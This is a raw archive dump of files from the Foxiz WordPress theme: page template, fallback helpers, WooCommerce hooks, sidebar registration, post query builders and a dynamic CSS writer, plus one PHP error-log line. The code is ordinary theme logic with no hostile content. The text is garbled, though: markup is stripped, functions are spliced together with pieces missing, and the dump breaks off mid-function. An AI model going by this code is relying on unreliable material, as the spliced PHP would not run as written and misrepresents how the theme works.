PK!6`page.phpnu[documents->get( get_the_ID() ); } if ( $document && $document->is_built_with_elementor() ) { the_content(); } else { foxiz_single_page(); } endwhile; endif; /** get footer */ get_footer();PK! error_lognu[[28-Sep-2023 23:34:05 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/index.php:5 Stack trace: #0 {main} thrown in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/index.php on line 5 PK!}dwpml-config.xmlnu[ foxiz_total_word rb_related title PK!Qbincludes/fallbacks.phpnu[ 999999 ) { $number = str_replace( '.00', '', number_format( ( $number / 1000000 ), 2 ) ) . foxiz_attr__( 'M' ); } elseif ( $number > 999 ) { $number = str_replace( '.0', '', number_format( ( $number / 1000 ), 1 ) ) . foxiz_attr__( 'k' ); } return $number; } } if ( ! function_exists( 'foxiz_render_svg' ) ) { /** * @param string $svg_name * @param string $color * @param string $ui * render svg */ function foxiz_render_svg( $svg_name = '', $color = '', $ui = '' ) { echo foxiz_get_svg( $svg_name, $color, $ui ); } } if ( ! function_exists( 'foxiz_get_svg' ) ) { /** * @param string $svg_name * @param string $color * @param string $ui * * @return false * get svg icon */ function foxiz_get_svg( $svg_name = '', $color = '', $ui = '' ) { return false; } } if ( ! function_exists( 'wp_body_open' ) ) { /** ensuring backward compatibility with versions of WordPress older than 5.2. */ function wp_body_open() { do_action( 'wp_body_open' ); } } if ( ! function_exists( 'foxiz_dark_mode' ) ) { /** * @return false|mixed|void */ function foxiz_dark_mode() { return foxiz_get_option( 'dark_mode' ); } } if ( ! function_exists( 'foxiz_get_breadcrumb' ) ) { /** * @return false */ function foxiz_get_breadcrumb( $classes = '' ) { return false; } } if ( ! function_exists( 'foxiz_render_breadcrumb' ) ) { /** * @param string $classes */ function foxiz_render_breadcrumb( $classes = '' ) { echo foxiz_get_breadcrumb( $classes ); } } if ( ! function_exists( 'foxiz_is_svg' ) ) { /** * @param string $attachment * * @return bool */ function foxiz_is_svg( $attachment = '' ) { if ( substr( $attachment, - 4, 4 ) === '.svg' ) { return true; } return false; } } if ( ! function_exists( 'foxiz_navigation_fallback' ) ) { /** * @param array $settings * * @return false */ function foxiz_navigation_fallback( $settings = array() ) { if ( ! current_user_can( 'manage_options' ) ) { return false; }; $menu_name = ''; if ( isset( $settings['fallback_name'] ) ) { $menu_name = $settings['fallback_name']; } ?>

array( 330, 220, $crop ), 'foxiz_crop_g2' => array( 420, 280, $crop ), 'foxiz_crop_g3' => array( 615, 410, $crop ), 'foxiz_crop_o1' => array( 860, 0, $crop ), 'foxiz_crop_o2' => array( 1536, 0, $crop ) ); foreach ( $sizes as $crop_id => $size ) { if ( empty( $settings[ $crop_id ] ) ) { unset( $sizes[ $crop_id ] ); } } if ( ! empty( $settings['featured_crop_sizes'] ) && is_array( $settings['featured_crop_sizes'] ) ) { foreach ( $settings['featured_crop_sizes'] as $custom_size ) { if ( ! empty( $custom_size ) ) { $custom_size = preg_replace( '/\s+/', '', $custom_size );; $hw = explode( 'x', $custom_size ); if ( ! empty( $hw[0] ) && ! empty( $hw[1] ) ) { $crop_id = 'foxiz_crop_' . $custom_size; $sizes[ $crop_id ] = array( absint( $hw[0] ), absint( $hw[1] ), $crop ); } } } } return $sizes; } } if ( ! function_exists( 'foxiz_get_adsense' ) ) { function foxiz_get_adsense() { return false; } } if ( ! function_exists( 'foxiz_get_ad_image' ) ) { function foxiz_get_ad_image() { return false; } } PK!}r**includes/woocommerce.phpnu['; } else { echo '
'; } echo '
'; echo '
'; } } /** close site-main */ if ( ! function_exists( 'foxiz_wc_template' ) ) { function foxiz_wc_template() { if ( ! is_shop() ) { return false; } $template = foxiz_get_option( 'wc_shop_template' ); if ( ! empty( $template ) ) { echo do_shortcode( $template ); } } } /** close site-main */ if ( ! function_exists( 'foxiz_wc_after_shop_loop' ) ) { function foxiz_wc_after_shop_loop() { echo '
'; } } /** close wrapper page-content */ if ( ! function_exists( 'foxiz_wc_after_main_content' ) ) { function foxiz_wc_after_main_content() { echo '
'; } } /** shop posts per page */ if ( ! function_exists( 'foxiz_wc_related_posts_per_page' ) ) { function foxiz_wc_related_posts_per_page( $args ) { $total = foxiz_get_option( 'wc_related_posts_per_page' ); $args['posts_per_page'] = $total; $args['columns'] = 4; return $args; } } /** remove zip code */ if ( ! function_exists( 'foxiz_optional_postcode_checkout' ) ) { function foxiz_optional_postcode_checkout( $fields ) { $fields['postcode']['required'] = false; return $fields; } } if ( ! function_exists( 'foxiz_checkout_customer_details_before' ) ) { function foxiz_checkout_customer_details_before() { ?>
'; $args['delimiter'] = ' > '; return $args; } } /** remove description */ if ( ! function_exists( 'foxiz_additional_information_heading' ) ) { function foxiz_additional_information_heading( $heading ) { return false; } } /** product review box */ if ( ! function_exists( 'foxiz_wc_review_box' ) ) { function foxiz_wc_review_box( $tabs ) { $check = foxiz_get_option( 'wc_box_review' ); if ( empty( $check ) ) { unset( $tabs['reviews'] ); } return $tabs; } } /** cross sell */ if ( ! function_exists( 'foxiz_wc_cross_sells_columns' ) ) { function foxiz_wc_cross_sells_columns( $columns ) { return 4; } } /** listing columns */ if ( ! function_exists( 'foxiz_wc_shop_columns' ) ) { function foxiz_wc_shop_columns() { if ( is_shop() ) { $sidebar_position = foxiz_get_option( 'wc_shop_sidebar_position' ); } elseif ( is_product_category() ) { $sidebar_position = foxiz_get_option( 'wc_archive_sidebar_position' ); } if ( ! empty( $sidebar_position ) && 'none' === $sidebar_position ) { return 4; } else { return 3; } } } if ( ! function_exists( 'foxiz_wc_sale_percent' ) ) { function foxiz_wc_sale_percent( $html, $post, $product ) { if ( ! foxiz_get_option( 'wc_sale_percent' ) || empty( $product->get_regular_price() ) ) { return $html; } if ( $product->is_on_sale() ) { $attachment_ids = $product->get_gallery_image_ids(); $class_name = 'onsale percent '; if ( empty( $attachment_ids ) ) { $class_name = 'onsale percent without-gallery'; } $percentage = round( ( ( $product->get_regular_price() - $product->get_sale_price() ) / $product->get_regular_price() ) * 100 ); return '' . '-' . esc_html( $percentage ) . '%' . ''; } } } if ( ! function_exists( 'foxiz_wc_add_to_cart_fragments' ) ) { function foxiz_wc_add_to_cart_fragments( $fragments ) { if ( ! foxiz_get_option( 'wc_mini_cart' ) ) { return $fragments; } ob_start(); ?> cart->cart_contents_count ); ?> ' . $mini_cart . ''; return $fragments; } } if ( ! function_exists( 'foxiz_wc_shop_products_per_page' ) ) { function foxiz_wc_shop_products_per_page( $total ) { $posts_per_page = foxiz_get_option( 'wc_shop_posts_per_page' ); if ( ! empty( $posts_per_page ) ) { $total = $posts_per_page; } return $total; } } if ( ! function_exists( 'foxiz_remove_single_breadcrumb' ) ) { function foxiz_remove_single_breadcrumb() { if ( is_product() ) { remove_action( 'woocommerce_before_main_content', 'woocommerce_breadcrumb', 20 ); } } } if ( ! function_exists( 'foxiz_wc_quantity_button' ) ) { function foxiz_wc_quantity_button() { ?> '; echo '
'; foreach ( $terms as $term ) { echo '' . esc_html( $term->name ) . ''; echo ''; } echo '
'; if ( function_exists( 'wc_get_template' ) ) { wc_get_template( 'loop/rating.php' ); } echo ''; } } } if ( ! function_exists( 'foxiz_wc_enqueue_styles' ) ) { function foxiz_wc_enqueue_styles( $styles ) { unset( $styles['woocommerce-general'] ); return $styles; } } if ( ! function_exists( 'foxiz_wc_single_breadcrumb' ) ) { function foxiz_wc_single_breadcrumb() { if ( function_exists( 'woocommerce_breadcrumb' ) ) { woocommerce_breadcrumb(); } } } PK!o4nuuincludes/include-files.phpnu[yincludes/sidebars.phpnu[ '1', 'html_tag' => 'h4' ); $footer_heading = array( 'layout' => '10', 'html_tag' => 'h4' ); $more_heading = array( 'layout' => '10', 'html_tag' => 'h5' ); if ( ! empty( $settings['widget_heading_tag'] ) ) { $heading['html_tag'] = $settings['widget_heading_tag']; $footer_heading['html_tag'] = $settings['widget_heading_tag']; } if ( ! empty( $settings['widget_heading_layout'] ) ) { $heading['layout'] = $settings['widget_heading_layout']; } elseif ( ! empty( $settings['heading_layout'] ) ) { $heading['layout'] = $settings['heading_layout']; } if ( ! empty( $settings['footer_widget_heading_layout'] ) ) { $footer_heading['layout'] = $settings['footer_widget_heading_layout']; } elseif ( ! empty( $settings['heading_layout'] ) ) { $footer_heading['layout'] = $settings['heading_layout']; } if ( ! empty( $settings['multi_sidebars'] ) && is_array( $settings['multi_sidebars'] ) ) { $data_sidebar = array(); foreach ( $settings['multi_sidebars'] as $sidebar ) { if ( ! empty( $sidebar ) ) { array_push( $data_sidebar, array( 'id' => 'foxiz_ms_' . foxiz_convert_to_id( trim( $sidebar ) ), 'name' => strip_tags( $sidebar ), ) ); } } foreach ( $data_sidebar as $sidebar ) { if ( ! empty( $sidebar['id'] ) && ! empty( $sidebar['name'] ) ) { register_sidebar( array( 'id' => $sidebar['id'], 'name' => $sidebar['name'], 'description' => esc_html__( 'A sidebar section of your site.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $heading ), 'after_title' => foxiz_get_end_widget_heading( $heading ), ) ); } }; } register_sidebar( array( 'id' => 'foxiz_sidebar_default', 'name' => esc_html__( 'Standard Sidebar', 'foxiz' ), 'description' => esc_html__( 'The default sidebar of your website', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $heading ), 'after_title' => foxiz_get_end_widget_heading( $heading ), ) ); register_sidebar( array( 'id' => 'foxiz_header_ad', 'name' => esc_html__( 'Header Advertising', 'foxiz' ), 'description' => esc_html__( 'Display widget ad at the bottom of the website header.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', ) ); register_sidebar( array( 'id' => 'foxiz_sidebar_more', 'name' => esc_html__( 'More Menu Section', 'foxiz' ), 'description' => esc_html__( 'The submenu section when hovering on the more button.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $more_heading ), 'after_title' => foxiz_get_end_widget_heading( $more_heading ), ) ); if ( 'shortcode' !== foxiz_get_option( 'footer_layout', false ) ) { register_sidebar( array( 'id' => 'foxiz_sidebar_fw_footer', 'name' => esc_html__( 'Footer - Top Full Width', 'foxiz' ), 'description' => esc_html__( 'The full width section at the top of the footer.', 'foxiz' ), 'before_widget' => '', 'before_title' => foxiz_get_start_widget_heading( $heading ), 'after_title' => foxiz_get_end_widget_heading( $heading ), ) ); register_sidebar( array( 'id' => 'foxiz_sidebar_footer_1', 'name' => esc_html__( 'Footer - Column 1', 'foxiz' ), 'description' => esc_html__( 'one of the columns of the footer area.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $footer_heading ), 'after_title' => foxiz_get_end_widget_heading( $footer_heading ), ) ); register_sidebar( array( 'id' => 'foxiz_sidebar_footer_2', 'name' => esc_html__( 'Footer - Column 2', 'foxiz' ), 'description' => esc_html__( 'one of the columns of the footer area.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $footer_heading ), 'after_title' => foxiz_get_end_widget_heading( $footer_heading ), ) ); register_sidebar( array( 'id' => 'foxiz_sidebar_footer_3', 'name' => esc_html__( 'Footer - Column 3', 'foxiz' ), 'description' => esc_html__( 'one of the columns of the footer area.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $footer_heading ), 'after_title' => foxiz_get_end_widget_heading( $footer_heading ), ) ); if ( empty( $settings['footer_layout'] ) || '3' !== (string) $settings['footer_layout'] ) { register_sidebar( array( 'id' => 'foxiz_sidebar_footer_4', 'name' => esc_html__( 'Footer - Column 4', 'foxiz' ), 'description' => esc_html__( 'one of the columns of the footer area.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $footer_heading ), 'after_title' => foxiz_get_end_widget_heading( $footer_heading ), ) ); } if ( ! empty( $settings['footer_layout'] ) && ( '5' === (string) $settings['footer_layout'] || '51' === (string) $settings['footer_layout'] ) ) { register_sidebar( array( 'id' => 'foxiz_sidebar_footer_5', 'name' => esc_html__( 'Footer - Column 5', 'foxiz' ), 'description' => esc_html__( 'one of the columns of the footer area.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $footer_heading ), 'after_title' => foxiz_get_end_widget_heading( $footer_heading ), ) ); } } register_sidebar( array( 'id' => 'foxiz_entry_top', 'name' => esc_html__( 'Single Content - Top Area', 'foxiz' ), 'description' => esc_html__( 'The section at the top of the single post content. It usually uses to display adverts', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $heading ), 'after_title' => foxiz_get_end_widget_heading( $heading ), ) ); register_sidebar( array( 'id' => 'foxiz_entry_bottom', 'name' => esc_html__( 'Single Content - Bottom Area', 'foxiz' ), 'description' => esc_html__( 'The section at the bottom of the single post content. It usually uses to display adverts or the post related shortcode.', 'foxiz' ), 'before_widget' => '
', 'after_widget' => '
', 'before_title' => foxiz_get_start_widget_heading( $heading ), 'after_title' => foxiz_get_end_widget_heading( $heading ), ) ); } }PK!mn1n1includes/query.phpnu[ '', 'category' => '', 'author' => '', 'format' => '', 'tags' => '', 'tag_in' => '', 'posts_per_page' => '', 'no_found_rows' => false, 'offset' => '', 'order' => 'date_post', 'post_type' => 'post', 'meta_key' => '', 'post_in' => '', 'post_not_in' => '', 'tag_not_in' => '', 'duplicate_allowed' => '', 'tax_query' => array(), 'unique' => '', 'ignore_sticky_posts' => 1 ), $data ); if ( ! class_exists( 'Post_Views_Counter' ) ) { if ( 'popular' === $data['order'] || 'popular_m' === $data['order'] || 'popular_w' === $data['order'] ) { $data['order'] = 'comment_count'; } } $params = array(); /** set foxiz_queried_ids */ if ( ! isset( $GLOBALS['foxiz_queried_ids'] ) ) { $GLOBALS['foxiz_queried_ids'] = array(); } $params['post_status'] = 'publish'; $params['ignore_sticky_posts'] = $data['ignore_sticky_posts']; $params['post_type'] = $data['post_type']; $params['no_found_rows'] = boolval( $data['no_found_rows'] ); $params['tax_query'] = array(); if ( ! empty( $data['posts_per_page'] ) ) { $params['posts_per_page'] = intval( $data['posts_per_page'] ); } if ( ! empty( $data['post_in'] ) ) { if ( is_string( $data['post_in'] ) ) { $params['post__in'] = explode( ',', $data['post_in'] ); } elseif ( is_array( $data['post_in'] ) ) { $params['post__in'] = $data['post_in']; } } else { $excluded_ids = array(); if ( ! empty( $data['post_not_in'] ) && is_string( $data['post_not_in'] ) ) { $excluded_ids = explode( ',', $data['post_not_in'] ); } elseif ( is_array( $data['post_not_in'] ) ) { $excluded_ids = $data['post_not_in']; } if ( count( $GLOBALS['foxiz_queried_ids'] ) && ! empty( $data['unique'] ) ) { $excluded_ids = array_merge( $excluded_ids, $GLOBALS['foxiz_queried_ids'] ); } if ( is_array( $excluded_ids ) ) { $params['post__not_in'] = $excluded_ids; } } if ( ! empty( $data['categories'] ) && 'all' !== $data['categories'] ) { if ( is_array( $data['categories'] ) ) { $params['cat'] = implode( ',', $data['categories'] ); } else { $params['cat'] = trim( $data['categories'] ); } } elseif ( ! empty( $data['category'] ) && 'all' !== $data['category'] ) { $params['cat'] = $data['category']; } if ( ! empty( $data['author'] ) ) { $params['author'] = $data['author']; } if ( ! empty( $data['format'] ) && 'post' === $data['post_type'] ) { if ( 'default' !== $data['format'] ) { $params['tax_query'][] = array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . trim( $data['format'] ) ), ); } else { $params['tax_query'][] = array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-gallery', 'post-format-video', 'post-format-audio' ), 'operator' => 'NOT IN', ); } } if ( ! empty( $data['tax_query'] ) ) { $params['tax_query'][] = $data['tax_query']; } if ( ! empty( $paged ) && $paged > 1 ) { $params['paged'] = absint( $paged ); } if ( ! empty( $data['offset'] ) ) { if ( $paged > 1 ) { $params['offset'] = absint( $data['offset'] ) + absint( ( $paged - 1 ) * absint( $data['posts_per_page'] ) ); } else { $params['offset'] = absint( $data['offset'] ); } unset( $params['paged'] ); } if ( ! empty( $data['tags'] ) ) { $data['tags'] = preg_replace( '/\s+/', '', $data['tags'] ); $params['tag'] = $data['tags']; } else { if ( ! empty( $data['tag_not_in'] ) ) { if ( ! is_array( $data['tag_not_in'] ) ) { $data['tag_not_in'] = explode( ',', $data['tag_not_in'] ); } $data['tag_not_in'] = array_unique( $data['tag_not_in'] ); foreach ( $data['tag_not_in'] as $tag_slug ) { $params['tax_query'][] = array( 'taxonomy' => 'post_tag', 'field' => 'slug', 'terms' => trim( $tag_slug ), 'operator' => 'NOT IN', ); } } } if ( ! empty( $data['tag_in'] ) && is_array( $data['tag_in'] ) ) { $params['tag__in'] = $data['tag_in']; } if ( ! empty( $data['meta_key'] ) ) { $params['meta_key'] = $data['meta_key']; $params['orderby'] = 'meta_value_num'; } switch ( $data['order'] ) { case 'date_post' : $params['orderby'] = 'date'; $params['order'] = 'DESC'; break; case 'update' : $params['orderby'] = 'modified'; $params['order'] = 'DESC'; break; case 'comment_count' : $params['orderby'] = 'comment_count'; $params['order'] = 'DESC'; break; case 'post_type' : $params['orderby'] = 'type'; break; case 'popular': $params['suppress_filters'] = false; $params['fields'] = ''; $params['orderby'] = 'post_views'; $params['order'] = 'DESC'; break; case 'popular_m': $params['suppress_filters'] = false; $params['fields'] = ''; $params['orderby'] = 'post_views'; $params['order'] = 'DESC'; $params['date_query'] = array( array( 'after' => '1 month ago', 'column' => 'post_date_gmt', ) ); break; case 'popular_w': $params['suppress_filters'] = false; $params['fields'] = ''; $params['orderby'] = 'post_views'; $params['order'] = 'DESC'; $params['date_query'] = array( array( 'after' => '7 days ago', 'column' => 'post_date_gmt', ) ); break; case 'top_review' : $params['meta_key'] = 'foxiz_review_average'; $params['orderby'] = 'meta_value'; $params['order'] = 'DESC'; break; case 'last_review' : $params['meta_key'] = 'foxiz_review_average'; $params['orderby'] = 'date'; $params['order'] = 'DESC'; break; case 'sponsored' : $params['meta_key'] = 'foxiz_sponsored'; $params['orderby'] = 'date'; $params['order'] = 'DESC'; break; case 'rand': $params['orderby'] = 'rand'; break; case 'alphabetical_order_decs': $params['orderby'] = 'title'; $params['order'] = 'DECS'; break; case 'alphabetical_order_asc': $params['orderby'] = 'title'; $params['order'] = 'ASC'; break; case 'by_input' : $params['orderby'] = 'post__in'; break; default : $params['orderby'] = 'date'; break; } $_query = new WP_Query( $params ); if ( count( $GLOBALS['foxiz_queried_ids'] ) ) { $_query->set( 'foxiz_queried_ids', $GLOBALS['foxiz_queried_ids'] ); } if ( ! empty( $_query->posts ) && empty( $data['duplicate_allowed'] ) ) { $post_ids = wp_list_pluck( $_query->posts, 'ID' ); if ( is_array( $post_ids ) ) { $GLOBALS['foxiz_queried_ids'] = array_unique( array_merge( $GLOBALS['foxiz_queried_ids'], $post_ids ) ); } } do_action( 'foxiz_after_query', $_query, $data ); return $_query; } } if ( ! function_exists( 'foxiz_query_related' ) ) { /** * @param array $data * @param int $paged * * @return WP_Query */ function foxiz_query_related( $data = array(), $paged = 1 ) { $defaults = array( 'posts_per_page' => '', 'post_id' => '', 'no_found_rows' => false, 'post_format' => '', 'where' => 'all', 'orderby' => 'date', 'offset' => '', 'meta_key' => '' ); $data = wp_parse_args( $data, $defaults ); if ( empty( $data['where'] ) ) { $data['where'] = 'all'; } if ( empty( $data['post_id'] ) ) { $data['post_id'] = get_the_ID(); } $params = array(); $params['ignore_sticky_posts'] = 1; $params['post_status'] = 'publish'; $params['post_type'] = 'post'; $params['orderby'] = $data['orderby']; $params['no_found_rows'] = boolval( $data['no_found_rows'] ); $params['post__not_in'] = explode( ',', $data['post_id'] ); if ( ! empty( $paged ) ) { $params['paged'] = $paged; } if ( ! empty( $data['offset'] ) ) { $params['offset'] = $data['offset']; } if ( ! empty( $data['posts_per_page'] ) ) { $params['posts_per_page'] = $data['posts_per_page']; } else { $params['posts_per_page'] = get_option( 'posts_per_page' ); } if ( empty( $data['categories'] ) ) { $data['categories'] = array(); $categories = get_the_category( $data['post_id'] ); if ( is_array( $categories ) ) { foreach ( $categories as $category ) { array_push( $data['categories'], $category->term_id ); } } } if ( empty( $data['tags'] ) ) { $data['tags'] = array(); $tags = get_the_tags( $data['post_id'] ); if ( is_array( $tags ) ) { foreach ( $tags as $tag ) { array_push( $data['tags'], $tag->slug ); } } } if ( ! empty( $data['meta_key'] ) ) { $params['meta_key'] = $data['meta_key']; } switch ( $data['where'] ) { case 'all': if ( ! empty( $data['categories'] ) && ! empty( $data['tags'] ) ) { if ( empty( $data['format'] ) ) { $params['tax_query'] = array( 'relation' => 'OR', array( 'taxonomy' => 'category', 'field' => 'term_id', 'terms' => $data['categories'], ), array( 'taxonomy' => 'post_tag', 'field' => 'slug', 'terms' => $data['tags'], ), ); } else { $params['tax_query'] = array( 'relation' => 'AND', array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . esc_attr( $data['format'] ) ), ), array( 'relation' => 'OR', array( 'taxonomy' => 'category', 'field' => 'term_id', 'terms' => $data['categories'], ), array( 'taxonomy' => 'post_tag', 'field' => 'slug', 'terms' => $data['tags'], ), ) ); } } elseif ( empty( $data['categories'] ) && ! empty( $data['tags'] ) ) { $params['tag'] = $data['tags']; if ( ! empty( $data['format'] ) ) { $params['tax_query'] = array( array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . esc_attr( $data['format'] ) ), ), ); } } elseif ( ! empty( $data['categories'] ) && empty( $data['tags'] ) ) { $params['cat'] = $data['categories']; if ( ! empty( $data['format'] ) ) { $params['tax_query'] = array( array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . esc_attr( $data['format'] ) ), ), ); } } break; case 'tag' : if ( ! empty( $data['tags'] ) ) { $params['tag_slug__in'] = $data['tags']; if ( ! empty( $data['format'] ) ) { $params['tax_query'] = array( array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . esc_attr( $data['format'] ) ), ), ); } } break; default : if ( ! empty( $data['categories'] ) ) { $params['cat'] = $data['categories']; if ( ! empty( $data['format'] ) ) { $params['tax_query'] = array( array( 'taxonomy' => 'post_format', 'field' => 'slug', 'terms' => array( 'post-format-' . esc_attr( $data['format'] ) ), ), ); } } break; } return new WP_Query( $params ); } }PK!1[includes/css.phpnu[settings = foxiz_get_option(); add_action( 'redux/options/' . FOXIZ_TOS_ID . '/saved', array( $this, 'write_css' ), 999 ); add_action( 'redux/options/' . FOXIZ_TOS_ID . '/reset', array( $this, 'write_css' ), 999 ); add_action( 'redux/options/' . FOXIZ_TOS_ID . '/section/reset', array( $this, 'write_css' ), 999 ); add_action( 'upgrader_process_complete', array( $this, 'write_css' ) ); add_action( 'create_category ', array( $this, 'write_css' ) ); add_action( 'edited_category', array( $this, 'write_css' ) ); add_action( 'after_switch_theme', array( $this, 'write_css' ), 999 ); add_action( 'activated_plugin', array( $this, 'write_css' ), 999 ); add_action( 'wp_update_nav_menu', array( $this, 'write_css' ), 999 ); add_action( 'enqueue_block_editor_assets', array( $this, 'admin_load' ), 999 ); add_action( 'wp_enqueue_scripts', array( $this, 'load' ), 999 ); } /** * @param $css * * @return string|string[]|null */ function minify_css( $css ) { return preg_replace( '@({)\s+|(\;)\s+|/\*.+?\*\/|\R@is', '$1$2 ', $css ); } /** * @return string */ function write_css() { $this->settings = foxiz_get_option(); $writable = false; $output = $this->output(); if ( foxiz_get_option( 'css_file' ) ) { $folder_path = get_theme_file_path( 'assets/css' ); $file_path = $folder_path . '/dynamic.css'; if ( is_multisite() ) { global $blog_id; $file_path = $folder_path . '/dynamic-blog-' . $blog_id . '.css'; } $writable = $this->writable_css( $output, $folder_path, $file_path ); } if ( empty( $writable ) ) { update_option( 'foxiz_style_cache', addslashes( $output ) ); } return $output; } /** * @param string $css * @param $folder_path * @param $file_path * * @return bool */ function writable_css( $css, $folder_path, $file_path ) { global $wp_filesystem; if ( empty( $wp_filesystem ) ) { require_once( ABSPATH . '/wp-admin/includes/file.php' ); WP_Filesystem(); } if ( $wp_filesystem ) { $content = "/** Compiled CSS - Do not edit */\n" . $css; if ( is_readable( $folder_path ) || ( file_exists( $file_path ) && is_writable( $file_path ) ) ) { if ( $wp_filesystem->put_contents( $file_path, $content, FS_CHMOD_FILE ) ) { update_option( 'foxiz_dynamic_ctime', time() ); return true; } } } return false; } /** * @param $handle */ function load( $handle ) { if ( empty( $handle ) ) { $handle = 'foxiz-style'; } $file_path = ''; $file_uri = ''; $version = get_option( 'foxiz_dynamic_ctime' ); if ( foxiz_get_option( 'css_file' ) ) { global $blog_id; if ( ! defined( 'FOXIZ_DTHEME_DIR' ) || ! defined( 'FOXIZ_DTHEME_URI' ) ) { $file_path = get_theme_file_path( 'assets/css/dynamic.css' ); $file_uri = get_theme_file_uri( 'assets/css/dynamic.css' ); if ( is_multisite() ) { $file_path = get_theme_file_path( 'assets/css/dynamic-blog-' . $blog_id . '.css' ); $file_uri = get_theme_file_uri( 'assets/css/dynamic-blog-' . $blog_id . '.css' ); } } else { $file_path = FOXIZ_DTHEME_DIR . 'assets/css/dynamic.css'; $file_uri = FOXIZ_DTHEME_URI . 'assets/css/dynamic.css'; if ( is_multisite() ) { $file_path = FOXIZ_DTHEME_DIR . 'assets/css/dynamic-blog-' . $blog_id . '.css'; $file_uri = FOXIZ_DTHEME_URI . 'assets/css/dynamic-blog-' . $blog_id . '.css'; } } } if ( ! empty( $file_path ) && ! empty( $file_uri ) && file_exists( $file_path ) ) { wp_enqueue_style( 'foxiz-dynamic-css', $file_uri, array( $handle ), $version ); } else { if ( $this->debug ) { $output = $this->output(); } else { $output = get_option( 'foxiz_style_cache' ); if ( empty( $output ) ) { $output = $this->write_css(); } else { $output = stripslashes( $output ); } } /** load */ wp_add_inline_style( $handle, $output ); } } function admin_load() { $this->load( 'foxiz-editor-style' ); } /** * @param $settings * @param $config_id * * @return string */ public function css_background( $settings, $config_id ) { if ( ! isset( $settings[ $config_id ] ) || ! is_array( $settings[ $config_id ] ) ) { return ''; } $background = $settings[ $config_id ]; $output = ''; if ( ! empty( $background['background-color'] ) ) { $output .= 'background-color : ' . $background['background-color'] . ';'; } if ( ! empty( $background['background-repeat'] ) ) { $output .= 'background-repeat : ' . $background['background-repeat'] . ';'; } if ( ! empty( $background['background-size'] ) ) { $output .= 'background-size : ' . $background['background-size'] . ';'; } if ( ! empty( $background['background-image'] ) ) { $output .= 'background-image : url(' . esc_url( $background['background-image'] ) . ');'; } if ( ! empty( $background['background-attachment'] ) ) { $output .= 'background-attachment : ' . $background['background-attachment'] . ';'; } if ( ! empty( $background['background-position'] ) ) { $output .= 'background-position : ' . $background['background-position'] . ';'; } return $output; } /** * @param array $settings * @param string $prefix * @param string $config_id * * @return false|string */ public function font_var( $settings = array(), $prefix = '', $config_id = '' ) { if ( empty( $settings[ $config_id ] ) || ! is_array( $settings[ $config_id ] ) ) { return false; } $output = ''; $font_array = shortcode_atts( array( 'font-family' => '', 'font-weight' => '', 'text-transform' => '', 'color' => '', 'font-style' => '', 'font-size' => '', 'letter-spacing' => '' ), $settings[ $config_id ] ); foreach ( $font_array as $name => $value ) { if ( ! empty( $value ) ) { $output .= '--' . $prefix . '-' . $this->compact_font_name( $name ) . ':' . $value . ';'; } } return $output; } /** * @param $name * * @return string */ public function compact_font_name( $name ) { $name = trim( $name ); switch ( $name ) { case 'font-family' : return 'family'; case 'font-weight' : return 'fweight'; case 'text-transform' : return 'transform'; case 'color' : return 'fcolor'; case 'font-style' : return 'fstyle'; case 'font-size' : return 'fsize'; case 'letter-spacing' : return 'fspace'; case 'line-height' : return 'fheight'; default : return $name; } } /** * @param array $settings * @param string $name * @param string $config_id * * @return false|string */ function font_size_var( $settings = array(), $name = '', $config_id = '' ) { if ( empty( $name ) || empty( $settings[ $config_id ] ) ) { return false; } if ( is_array( $settings[ $config_id ] ) ) { if ( ! empty( $settings[ $config_id ]['font-size'] ) ) { return '--' . $name . '-fsize : ' . floatval( $settings[ $config_id ]['font-size'] ) . 'px;'; } return false; } else { return '--' . $name . '-fsize : ' . floatval( $settings[ $config_id ] ) . 'px;'; } } /** * @param array $settings * @param string $name * @param string $config_id * * @return string */ function get_gradient_background_var( $settings = array(), $name = '', $config_id = '' ) { if ( empty( $name ) || empty( $settings[ $config_id ] ) ) { return false; } $output = ''; if ( ! empty( $settings[ $config_id ]['from'] ) && ! empty( $settings[ $config_id ]['to'] ) ) { $output .= '--' . $name . '-bg: ' . $settings[ $config_id ]['from'] . ';'; $output .= '--' . $name . '-bg-from: ' . $settings[ $config_id ]['from'] . ';'; $output .= '--' . $name . '-bg-to: ' . $settings[ $config_id ]['to'] . ';'; } elseif ( ! empty( $settings[ $config_id ]['from'] ) ) { $output .= '--' . $name . '-bg: ' . $settings[ $config_id ]['from'] . ';'; $output .= '--' . $name . '-bg-from: ' . $settings[ $config_id ]['from'] . ';'; $output .= '--' . $name . '-bg-to: ' . $settings[ $config_id ]['from'] . ';'; } elseif ( ! empty( $settings[ $config_id ]['to'] ) ) { $output .= '--' . $name . '-bg: ' . $settings[ $config_id ]['to'] . ';'; $output .= '--' . $name . '-bg-from: ' . $settings[ $config_id ]['to'] . ';'; $output .= '--' . $name . '-bg-to: ' . $settings[ $config_id ]['to'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_typography_var( $settings = array() ) { $output = ''; $buffer = ''; $buffer .= $this->font_var( $settings, 'body', 'font_body' ); $buffer .= $this->font_var( $settings, 'h1', 'font_h1' ); $buffer .= $this->font_var( $settings, 'h2', 'font_h2' ); 